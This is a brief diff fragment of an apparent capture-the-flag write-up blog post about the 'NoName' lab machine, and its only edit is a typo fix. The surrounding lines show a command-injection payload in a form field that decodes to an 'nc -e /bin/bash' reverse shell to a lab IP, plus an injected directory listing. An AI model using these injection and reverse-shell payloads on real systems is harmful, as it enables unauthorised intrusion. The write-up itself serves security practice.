Ha-L0/Ha-L0.github.io/_posts/2023-08-04-[H4]-Proving-Grounds-Play-VULNHUB-NoName.md

 pinger=127|`echo%20%22bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDUuMjIzIDgwCg==%22%20|base64%20-d`&submitt=Submit
 ```

-> Unfortunately we do not get a connect.
+> Unfortunately we do not get a connection.
 Maybe `nc` is not available.
 {: .prompt-danger }

 payload: `ls -lsah /bin`
 Lets inspect which binaries are available on the target system.
 ```http
 POST /superadmin.php HTTP/1.1